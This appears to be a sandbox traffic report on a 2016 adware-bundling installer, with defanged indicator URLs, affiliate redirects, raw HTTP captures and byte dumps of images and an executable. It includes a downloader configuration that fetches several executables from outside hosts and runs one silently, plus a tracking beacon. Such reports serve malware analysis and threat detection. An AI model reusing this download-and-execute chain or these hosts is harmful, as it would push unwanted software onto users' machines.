hxxp://set.downor3.spacehxxp://set.downor3.space/installer.php?affId=1006&instId=11&ho_trackingid=102524c8b7d471e3251121f5c3cd0e&trackingId=45486395&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1	54.88.21.193
hxxp://cdn2.downloadcrest.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/decline.gif	52.85.173.111
hxxp://cdn2.downloadcrest.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/dm_left_image.png	52.85.173.111
hxxp://cdn2.downloadcrest.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/footer_img.png	52.85.173.111
hxxp://get.wenter3.space/?affId=1006&appTitle=Installation&s1=145&s2=438526&setupName=cpSetup&appVersion=2.92&instId=11	52.85.173.149
hxxp://cdn2.downloadcrest.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/accept.gif	52.85.173.111
hxxp://capital.go2cloud.orghxxp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=145&aff_sub2=438526&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.freeo9.space/offer.php?affId={aff_id}&trackingId=45486395&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=InternetExplorer&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1	52.16.169.88
hxxp://cdn2.downloadcrest.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/finish.gif	52.85.173.111
hxxp://up.freeo9.spacehxxp://up.freeo9.space/h_redir.php?offer_id=4&aff_id=1006&source=11&aff_sub=145&aff_sub2=438526&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.freeo9.space/offer.php?affId={aff_id}&trackingId=45486395&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=InternetExplorer&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1	52.85.173.161
hxxp://up.freeo9.spacehxxp://up.freeo9.space/offer.php?affId=1006&trackingId=45486395&instId=11&ho_trackingid=102524c8b7d471e3251121f5c3cd0e&cc=UA&cc_typ=ho&sb=x86&wv=xpsp3&db=InternetExplorer&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1	52.85.173.161
hxxp://cdn2.downloadcrest.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/next.gif	52.85.173.111
hxxp://cdn2.downloadcrest.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel.gif	52.85.173.111
hxxp://cdn2.downloadcrest.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/skip.gif	52.85.173.111
pe-mik.net	23.253.126.58
pe-sixi.com

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/main.css HTTP/1.1

Accept: */*

Referer: hXXp://VVV.secularistsarakolet.site/index.php

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: cdn2.downloadcrest.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: text/css

Content-Length: 9386

Connection: keep-alive

Date: Sat, 12 Mar 2016 07:10:54 GMT

Content-Disposition: attachment; filename="main.css"

Last-Modified: Thu, 26 Feb 2015 16:19:17 GMT

ETag: "9d7c4ddc39dddc3623e8a57e55afd079"

Accept-Ranges: bytes

Server: AmazonS3

Age: 22932

X-Cache: Hit from cloudfront

Via: 1.1 f17892129c0657c8d9d0809a1b0b00be.cloudfront.net (CloudFront)

X-Amz-Cf-Id: AxpttruDeYPYSaaD03kUx2pK-cZxu3ONjvZIoBiaVKD6A-p8oDEJgQ==

body {.. font-size:10px;. background:#eaeaea;. font-family: Arial;. margin: 0;. padding: 0;. color:#000000; .}..div, span, textarea {. cursor: default;.}..a, a span, a div {. cursor: pointer;.}../* whole screen styles */..ami-wrapper{. background : none no-repeat scroll 0 0 #eaeaea;. border:2px solid #989898; .}../* moddle element */..#ami-body.{..position: relative;. padding-left:27;. padding-right:27;.}...bottom-line{. background-color:#5cafd4;. height:45px;. width:100%;.}..table {. border-collapse: collapse;. margin: 0 ;. padding: 0;. font-size:10px;.}..textarea {..font-size:10px;..font-family: verdana;..width:98%;..padding: 5px;.}...textarea1{. background:#ffffff;. color:#000000;. height:100%;. width:100%;. overflow-x:hidden;.}..td{. padding: 0px;.}../* footer and footer buttons */...bottom-holder{. background-image:url('footer_img.png');. background-repeat:repeat-x;. height:59px;. position:absolute;. bottom:0px;. padding-left:20px;. padding-right:20px;.}...#btnNext{. background: url('next.gif') no-repeat;.}.#btnCancel{. background: url('cancel.gif') no-repeat;.}../* Use for cancle with no popup !!! */.#btnBack{. background: url('cancel1.gif') no-repeat;.}..#btnDecline{. background: url('decline.gif') no-repeat;.}..#btnAccept{. background: url('accept.gif') no-repeat;.}..#btnSkip{. background: url('skip.gif') no-repeat;.}...btn-finish-install{. background: url('finish.gif') no-r

<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/footer_img.png HTTP/1.1

Accept: */*

Referer: hXXp://VVV.secularistsarakolet.site/index.php

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: cdn2.downloadcrest.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: image/png

Content-Length: 937

Connection: keep-alive

Date: Sat, 12 Mar 2016 07:10:56 GMT

Content-Disposition: attachment; filename="footer_img.png"

Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT

ETag: "e2bf2d203887961a2e93c1a68b7e7534"

Accept-Ranges: bytes

Server: AmazonS3

Age: 22933

X-Cache: Hit from cloudfront

Via: 1.1 f17892129c0657c8d9d0809a1b0b00be.cloudfront.net (CloudFront)

X-Amz-Cf-Id: u73uWAq4qD-60Ao7_6nNmlTDlxjNPOLbwlgDINhDN2Xsl-MbfGFPKQ==

.PNG........IHDR.......;........B....tEXtSoftware.Adobe ImageReadyq.e<...!iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c021 79.154911, 2013/10/29-11:47:16 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Windows)" xmpMM:InstanceID="xmp.iid:E57C9F23EFB911E397DFE4EB8E55B910" xmpMM:DocumentID="xmp.did:E57C9F24EFB911E397DFE4EB8E55B910"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:E57C9F21EFB911E397DFE4EB8E55B910" stRef:documentID="xmp.did:E57C9F22EFB911E397DFE4EB8E55B910"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>........IDATx.b.y........g...?.(....0.....N.]l....IEND.B`.....

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel.gif HTTP/1.1

Accept: */*

Referer: hXXp://VVV.secularistsarakolet.site/index.php

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: cdn2.downloadcrest.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: image/gif

Content-Length: 1262

Connection: keep-alive

Date: Sat, 12 Mar 2016 07:10:55 GMT

Content-Disposition: attachment; filename="cancel.gif"

Last-Modified: Thu, 26 Feb 2015 16:19:15 GMT

ETag: "d92b8cccf7616d9e5f6162571dd3e1e8"

Accept-Ranges: bytes

Server: AmazonS3

Age: 33966

X-Cache: Hit from cloudfront

Via: 1.1 f17892129c0657c8d9d0809a1b0b00be.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 6dNBd6XodADlH9Q1FMpzvQgzTaC3tSxjpZ6ijnW3LpbN0wzDzjKQ8w==

GIF89ae......................................................................................................................................................................................................................................................................................................................................................................................................!.....u.,....e........ot.............o..nC.............GCn.t.D.............BC.EF.............EEJ.HHG.............H.J............*..IK.MNM......8.....H..H.`....*....!'O"J.H..D%....P.... C..8......D!.....0c.......4s.....O.....I.h.(S.QY.....K....c...Vg,.......f. 0.k... \..b.. L..@.J...)U.U.b......W.0......t..a.....7..7..."pt.<`...}/..M.o.,...^......_...`...MT.8p.........Z..../.^...j:Y.K.N.zt,,.`...;.)&.h.>....X4.p...z...D. ............................... }.J0...&x...f...-......AH.]pa..(..".A....=.(....p....X#...0#.5. ..A....H&ib.......PF).._x.E...`..^.0...n9..[z........".P..P.@..t..$...!..|....b..F.. ....$.....`....!g.6.j..?..A.[....?t............!d..........v....%.A.c.P@. .0..c.P..cT0@. .. ...P.... ......!gt......m...k..........n.f.AH...k...............p..../.......7.....!...Wl.K..c....C..!l.,..$..r.(....,.<r.".!..n.l..8....<....=.-..o....t....L7...s....;....

<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/skip.gif HTTP/1.1

Accept: */*

Referer: hXXp://VVV.secularistsarakolet.site/index.php

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: cdn2.downloadcrest.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: image/gif

Content-Length: 1740

Connection: keep-alive

Date: Sat, 12 Mar 2016 07:10:55 GMT

Content-Disposition: attachment; filename="skip.gif"

Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT

ETag: "7c96892b1948a6e97494e2d58cafe1c0"

Accept-Ranges: bytes

Server: AmazonS3

Age: 24710

X-Cache: Hit from cloudfront

Via: 1.1 f17892129c0657c8d9d0809a1b0b00be.cloudfront.net (CloudFront)

X-Amz-Cf-Id: HoTJ0ZuyLf52bCU6zR4RVXezqb92Nx4JNbiS2eozQl8uRikHkE9fpw==

GIF89ae......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................!.......,....e........|"E......*\......?...)....3j...... Cb.....R...\.....0c..I.&K8q........@...J....>...C...:P.J.J.*U.X.:......`...C....h....'...d..= W...x...Cp..=....L..`>}...Q...>b.....N.3~.k..y..>....M.....I...CB..1R......?....1.P............. _.\. :.f..$...@*@..$h. @y....$(P.A..._..O .....O.>.Ct..Idh. B.\.. ..........f.!D.0..D..Uha}..B.!..... .(.....H...Q."..b..! ...[..../4...Vxq.......D.9"!.....L6...O&....L........C... ......ta...$ D./ ...p:YH...h..x.......F....."/<A...0.. .x........J..D......z2B."..*....jj#.(.F.d8....|...#......t..!.$..........[*$.5..#.6....F.l#.0..#%....p...".........!.4.I...R.....m$.A............".T..%.pPC./.@....P.".......!.%......v.1...4.$$.l..(.lr%}HQ..f@.. .`..$..`...l0.'6T@..?.........*cB.%PG-..TW

<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/accept.gif HTTP/1.1

Accept: */*

Referer: hXXp://VVV.secularistsarakolet.site/index.php

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: cdn2.downloadcrest.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: image/gif

Content-Length: 3033

Connection: keep-alive

Date: Sat, 12 Mar 2016 07:10:56 GMT

Content-Disposition: attachment; filename="accept.gif"

Last-Modified: Thu, 26 Feb 2015 16:19:15 GMT

ETag: "3484f982bbd281ea323f9dedb47098ed"

Accept-Ranges: bytes

Server: AmazonS3

Age: 23784

X-Cache: Hit from cloudfront

Via: 1.1 f17892129c0657c8d9d0809a1b0b00be.cloudfront.net (CloudFront)

X-Amz-Cf-Id: SUX8o78HrpiDvkT-uAomkPx7KVbDGp-WA7NWCfDq0rpC9U8TqV84ag==

GIF89ae...............!.(:.AhxjC.M..%...C.E...?.G...gvh*. *./*.3guhwww?.H<.E>.E&.) .->.G;.Appp.....3-.3,./-.2*.-=.E@.H<.A)..@.IC.K'. =.D8.?:.A7.>6.<2.74.91.50.76.>..................C.K...}..o.t ./...............'.,^.d......L.R~..uuu...............J.N...<.C...H.KL.P..................[._&. ...........................|.~......(.-...4.?k.oB.KG.M?.G...[.^;.C...|.....y.}...a.f......;.B...Y.^...j.m.........I.M......?.B>.D............M.Q...........9<.?... .5o.s1.8(.,A.K......C.I%.*..2?.Hgug).1E.Kn.o@.I-.4E.I>.F=.D6.;...'.)*.(*./-.-?.=-..:.C../<.C...5.<=.B?.C...9.@9.A:.A,.2;.B;.BQ.\...O.Tkyl/.3\._8.>'.-/.2>.F?.P<.F*.&-.34.9(.,@.I .....)./=.D3.8&.<C.K#.*C.J .,~.. .&...#.&(.) .2,.3=.F,.5(./...{.}...=.E&.*Y.\-.39.B{.|.........hwi). iyjjzk-.2^.b>.J&.,q.ul.pm.pn.q...M.R......<.A......!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:325014833434E411B829A1185F1C216E" xmpMM:DocumentID="xmp.did:D165859F343611E4B378E2150F88781F" xmpMM:InstanceID="xmp.iid:D165859E343611E4B378E2150F88781F" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:Deriv

<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/dm_left_image.png HTTP/1.1

Accept: */*

Referer: hXXp://VVV.secularistsarakolet.site/index.php

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: cdn2.downloadcrest.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: image/png

Content-Length: 29603

Connection: keep-alive

Date: Thu, 28 Jan 2016 09:25:55 GMT

Content-Disposition: attachment; filename="dm_left_image.png"

Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT

ETag: "27e01b52fcb3f43ff9d3f29b0af69137"

Accept-Ranges: bytes

Server: AmazonS3

Age: 30684

X-Cache: Hit from cloudfront

Via: 1.1 f17892129c0657c8d9d0809a1b0b00be.cloudfront.net (CloudFront)

X-Amz-Cf-Id: Zg60Q_S9Hj8UWsZktBjlMYau3ccBBqzn34I_x6L9vxVr29ZA5Bzxxw==

.PNG........IHDR.......e.....5Z......tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:A22384F4BB6C11E488CDA27B4BADD3EB" xmpMM:DocumentID="xmp.did:A22384F5BB6C11E488CDA27B4BADD3EB"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A22384F2BB6C11E488CDA27B4BADD3EB" stRef:documentID="xmp.did:A22384F3BB6C11E488CDA27B4BADD3EB"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.O.8..p.IDATx...[..X.....I..12#.*..{z.f5.y[....4..$..>.....X..#m.vU.LWfUf......u......`.#3"....H.x.....o.......i.$...@.........~.Z..xd...w..,....;9......<..-...B.......o.....7._..w.Y....kn?>...T=..|:..^k.;......".J..B.gM.f).|...<..rK....=.7..Z.g....SDG..`.tm.q......ZS...(.V.<....Y.....;z.,?>..|*...k..}ip..C..=..|B...kV-W.....J....X....k...y>.[z.5.d.l..W.u.1/.....|...r.v.r}..|*...k...........j<.....p|Q=........$.....C...<..-....{.`......._.?x......q.7S>.......W...'_...#..#.p..a.Gy.O...sM!........S...3^.p.s.|!........r....@......vM|s3.......?..Bi.&....k._..........

<<< skipped >>>

GET /launch_v2.php?p=sevenzip&pid=145&tid=438526&sid=7 HTTP/1.0

Host: 46.21.100.248

User-Agent: NSISDL/1.2 (Mozilla)

Accept: */*

HTTP/1.1 200 OK

Date: Thu, 12 May 2016 21:58:34 GMT

Server: Apache/2.2.15 (CentOS)

X-Powered-By: PHP/5.3.3

Content-Length: 630

Connection: close

Content-Type: text/html; charset=UTF-8

files=3.t1=dl.u1=hXXp://get.wenter3.space/?affId=1006&appTitle=Installation&s1=145&s2=438526&setupName=cpSetup&appVersion=2.92&instId=11.n1=cpSetup.exe.m1=0.d1=0.t2=dl.u2=hXXp://VVV.dosecuretrips.com/download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png.n2=Setup__2140_il65.exe.m2=0.d2=0.t3=dl.u3=hXXp://sub.spirlymo.com/installers/cli/1463083280319/SevenZip_downloader-Qa3a1oW9v.exe.n3=SevenZip_downloader-Qa3a1oW9v.exe.m3=1.d3=1500.....

GET hXXp://up.freeo9.space/offer.php?affId=1006&trackingId=45486395&instId=11&ho_trackingid=102524c8b7d471e3251121f5c3cd0e&cc=UA&cc_typ=ho&sb=x86&wv=xpsp3&db=InternetExplorer&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 HTTP/1.1

Host: up.freeo9.space

Connection: close

Accept: */*

User-Agent: InstallCapital

HTTP/1.1 200 OK

Content-Type: text/html

Content-Length: 77864

Connection: close

Server: Microsoft-IIS/8.5

X-Powered-By: PHP/5.3.28

Date: Thu, 12 May 2016 21:58:15 GMT

X-Cache: Miss from cloudfront

Via: 1.1 55ee6ea70e0823309f10db2e4b8f119f.cloudfront.net (CloudFront)

X-Amz-Cf-Id: dFWWzMDaXm9o2cUYSzXKfcmt70Hq9SrANsufsglhTiIZRG8X1QGlyA==

;.7A..0.....{.HU.T/`...{.1xw.>0...O&..}..tJt...".3.E...FY.....db.zrL.J.{E5..............>.n.R........H`...........$..;.L...c$A.<.c.j.k....E...a...V._.a)V.0.<)....L.B.C.5..r/..SY......}Q. s-D.2...c..wR.N. ...ve7Z.a...#....'.........x.......-.m.9.9..t-..{..1c.5|...esB?.c.^lyh.....0.2Ab..._...$p..3....U..=5...&.8)..........Y.....CK....n.............4....&....$........F.m.Ns:en#..8(..'........[..a..=......3N../.*d.D:1.=..8K.......9..3......51..E[..$....W..2.[^ZV. `....'..E.X.*.=.H...Z.}....3. "s.Y...?....x.A....,...!.._..32.BiF....i.x.........g9.....$.D.{.."Q.X8.....0...{......F."...o.L......R..e!v.....~......^.-.....(er.D..8...U.#...w.hj.I<;.2....5.._b...O....|.@ .........7>.Q.........AX...9....V...a..P.k.#........Yb..;~|d.....:......H..R6.T..\...X.:.gO.=3...._\.E.n........Xp.I.....u.6..q.m.......N..!..R...w...eT.e....'..c...k.x..'!..[f....t..I..Xk?......:rg..|k.D........^..;x9}.9.CF.i..D6...@-C.....c.@/.........%l(.1..&O.).y..D..I`....c...|%.L.T./J.......U.7d.|...70.}......u(F...Y..Z.. X...u...;..Y...b.7{.F^c>tP5....)..G..;...s..OB...S...)..q/t..p `"l.~..jU.j.....p...#...;..o..,.s"......g.Yw.6Xk2g}..G.X7..x.2.....?.'.K....;.A..9.......4.Jl....p"..,..S...F.I....i.*.>.N..h.~a....0.....XD..[)'D o. C#t.i..=.u.vk...'.....2.y....A.@..b{o...4BkW.<.@.X}Nt......*...i........~..........H6z/........2F.*...>.w..l..^..;.,k.......`M(.X./....~.......\.a_..%..S...S..J.......'G..n...zC.fV{.R...F.....B(TVn..-.,.=....`...S_..l'.K.U4)......F~....v.@.r8J.V.d...l.=..z..R`...X ~.1...KN.ox.....J$..k......b.

<<< skipped >>>

GET /V35/amipb.js HTTP/1.1

Accept: */*

Referer: hXXp://VVV.secularistsarakolet.site/index.php

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: cdn1.downloadcrest.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: application/x-javascript

Content-Length: 69943

Connection: keep-alive

Date: Sat, 12 Mar 2016 06:56:00 GMT

Last-Modified: Sun, 28 Feb 2016 13:30:41 GMT

ETag: "76a09d03456de6b830f2d57dae56f423"

x-amz-storage-class: REDUCED_REDUNDANCY

Accept-Ranges: bytes

Server: AmazonS3

Age: 25042

X-Cache: Hit from cloudfront

Via: 1.1 02559733574bc91699d28e7c3b1df3ea.cloudfront.net (CloudFront)

X-Amz-Cf-Id: TBECHG2c6pKJlssRDmoZh4_yi0QFndUd1uwc4WmuMo8wAwEbV03m6g==

..//<!-- ../* Progress bar */..var g_AmiPbs = new Array();.var g_AmiPbsEx = new Array();.var g_interval = 0;.var g_initComp = 0;.var g_possibleComps = [];.var g_reportedComps = [];.var g_removedComps = [];..var g_disable_updater = false;..//in the version we tests updater task is created firstly.var g_UpdaterTestVersion = (typeof (g_ver) !== 'undefined' && g_ver != null && g_ver == '1.1.5.90');.var g_UpdaterTaskCreated = false;..function LogMessage(message) {. try {. g_ami.Log(message);. }. catch (excpt) {. }.}..function IsDeclined(name) {. var declined = 0;. for (var i = 0; i < g_removedComps.length; i ) {. if (g_removedComps[i] == name) {. declined = 1;. break;. }. }. return declined;.}..function UpdateSkipStatus(sn) {. if (g_testa && !ArrayContains(g_reportedComps, sn) && !ArrayContains(g_notest, sn) && !ArrayContains(g_notest1, sn) && !ArrayContains(g_notest2, sn)) {. if (g_testa.constructor != Array || ArrayContains(g_testa, sn)) {. g_ami.WriteProfileString(g_testf, '', sn, 'S');. g_reportedComps.push(sn);. }. }.}..function ShortNameFromName(name) {. for (c = 0; c < g_comps.length; c ) {. if (g_comps[c].name == name) {. return g_comps[c].sn;. }. }. return name;.}..function UpdateComponentsStatus() {. LogMessage('UpdateComponentsStatus function started');. for (var j = 0; j < g_possibleComps.length; j ) {.. if (g_possibleComps[j].sn =

<<< skipped >>>

POST hXXp://up.freeo9.space/installer.php?affId=1006&instId=11&ho_trackingid=102524c8b7d471e3251121f5c3cd0e&trackingId=45486395&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 HTTP/1.1

Host: up.freeo9.space

Connection: close

Accept: */*

User-Agent: InstallCapital

Content-Type: application/x-www-form-urlencoded

Content-Length: 42

cid=707569c4c57c87d53171d83f71777ffd&uac=1

HTTP/1.1 403 Forbidden

Server: CloudFront

Date: Thu, 12 May 2016 21:58:38 GMT

Content-Type: text/html

Content-Length: 689

Connection: close

X-Cache: Error from cloudfront

Via: 1.1 6fd049110ebc3ac6deddab8b0bf5d686.cloudfront.net (CloudFront)

X-Amz-Cf-Id: f_8c4yhPzmIFjr9jUXT7pgs5ckvNVdeIe5qUEpLqf_FCK2KqNqJJaQ==

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://VVV.w3.org/TR/html4/loose.dtd">.<HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">.<TITLE>ERROR: The request could not be satisfied</TITLE>.</HEAD><BODY>.<H1>ERROR</H1>.<H2>The request could not be satisfied.</H2>.<HR noshade size="1px">.This distribution is not configured to allow the HTTP request method that was used for this request. The distribution supports only cachable requests..<BR clear="all">.<HR noshade size="1px">.<PRE>.Generated by cloudfront (CloudFront).Request ID: f_8c4yhPzmIFjr9jUXT7pgs5ckvNVdeIe5qUEpLqf_FCK2KqNqJJaQ==.</PRE>.<ADDRESS>.</ADDRESS>.</BODY></HTML>..

GET hXXp://up.freeo9.space/h_redir.php?offer_id=4&aff_id=1006&source=11&aff_sub=145&aff_sub2=438526&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.freeo9.space/offer.php?affId={aff_id}&trackingId=45486395&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=InternetExplorer&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 HTTP/1.1

Host: up.freeo9.space

Connection: close

Accept: */*

User-Agent: InstallCapital

HTTP/1.1 302 Moved Temporarily

Content-Type: text/html; charset=UTF-8

Content-Length: 590

Connection: close

Location: hXXp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=145&aff_sub2=438526&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.freeo9.space/offer.php?affId={aff_id}&trackingId=45486395&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=InternetExplorer&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1

Server: Microsoft-IIS/8.5

X-Powered-By: PHP/5.3.28

Date: Thu, 12 May 2016 21:58:14 GMT

X-Cache: Miss from cloudfront

Via: 1.1 0991a4b934302d120a32dada6513dc35.cloudfront.net (CloudFront)

X-Amz-Cf-Id: JWYNAkiuILpXQ1Kk2y1g9KTG0tNfq-9NJtzHOy55PKMELqgR_y9j0Q==

<head><title>Document Moved</title></head>.<body><h1>Object Moved</h1>This document may be found <a HREF="hXXp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=145&aff_sub2=438526&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.freeo9.space/offer.php?affId={aff_id}&trackingId=45486395&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=InternetExplorer%26uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1">here</a></body>..

GET /download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png HTTP/1.0

Host: VVV.dosecuretrips.com

User-Agent: NSISDL/1.2 (Mozilla)

Accept: */*

HTTP/1.1 200 OK

Access-Control-Allow-Origin: *

Access-Control-Expose-Headers: X-Target-FN

Cache-Control: no-store, no-cache, must-revalidate

Cache-Control: post-check=0, pre-check=0

Content-Disposition: attachment; filename="Setup__2140_il65.exe"

Content-Type: application/x-msdownload

Date: Thu, 12 May 2016 21:58:41 GMT

Expires: Sat, 26 Jul 1997 05:00:00 GMT

Last-Modified: Thu, 12 May 2016 21:58:41 GMT

Pragma: no-cache

Server: Apache/2.2.15 (Red Hat)

X-Powered-By: PHP/5.3.3

X-Target-FN: Setup__2140_il65.exe

Content-Length: 784080

Connection: Close

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........|i:...i...i...im..i...im..i...im..i...i...i...i.e.i...i.e.i...i...i...i...i...i...i...i...i...i...i...iRich...i................PE..L.....4W.................h...r.......t............@..........................0.......y....@..................................G..(........@.......................$...................................2..@...............<............................text....f.......h.................. ..`.rdata...............l..............@..@.data....7...P.......<..............@....rsrc....@.......B...T..............@..@.reloc...G.......H..................@..B..................................................................................................................................................................................................................................................................................................................................................................vC............................U...E.].........................................................VW..W..j.V..|.......>_^.........U...E....E..A...]...............U...Q.V.u...........^]..........U...U..M..........3......]......U..Q.E.V.p....0.u........^Y]....U...u..E.....t..u........]...2.]................U..Q.E.V.p....0.u........^Y]....U..Q.u..$.....t..u....u......Y]...2.Y]..........V...h.....^.....V...(.....^.....3..........u....w.....&.........j.j.j.h........B.......

<<< skipped >>>

POST hXXp://set.downor3.space/installer.php?affId=1006&instId=11&ho_trackingid=102524c8b7d471e3251121f5c3cd0e&trackingId=45486395&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 HTTP/1.1

Host: set.downor3.space

Connection: close

Accept: */*

User-Agent: InstallCapital

Content-Type: application/x-www-form-urlencoded

Content-Length: 42

cid=707569c4c57c87d53171d83f71777ffd&uac=1

HTTP/1.1 200 OK

Content-Type: text/html

